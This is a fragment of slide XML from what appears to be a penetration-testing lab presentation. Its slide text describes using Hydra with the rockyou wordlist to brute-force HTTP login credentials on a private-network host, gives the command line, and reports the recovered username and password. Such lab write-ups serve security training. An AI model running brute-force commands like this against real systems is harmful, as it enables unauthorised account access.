            <a:off x="1611828" y="1291406"/>
            <a:ext cx="2639798" cy="20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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1497509" y="1308225"/>
            <a:ext cx="2840885" cy="19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Hydra program was used to run a brute force attack on the login credentials.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Hydra -l ashton -p rockyou.txt -s 80 -f -vV 192.168.1.105 http-get/company_folders/secret_folder/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1" name="Google Shape;1111;p9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1349293" y="732535"/>
            <a:ext cx="533372" cy="541347"/>
            <a:chOff x="-37699" y="1368557"/>
            <a:chExt cx="695400" cy="705706"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1112" name="Google Shape;1112;p9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-37699" y="1368557"/>
              <a:ext cx="695400" cy="621301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3" name="Google Shape;1113;p9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="163431" y="1885638"/>
              <a:ext cx="340326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4" name="Google Shape;1114;p9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4524369" y="740403"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1115" name="Google Shape;1115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7" name="Google Shape;1117;p9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4819625" y="1273875"/>
            <a:ext cx="2428500" cy="20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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4819625" y="1273875"/>
            <a:ext cx="2428500" cy="20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was able to successfully find the login credentials. Using ashton as a guess for username.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Username: ashton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Password: leopoldo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9" name="Google Shape;1119;p9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="155865" y="2896345"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1120" name="Google Shape;1120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1" name="Google Shape;1121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22" name="Google Shape;1122;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="75842"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="155865" y="3423099"/>
            <a:ext cx="7601001" cy="14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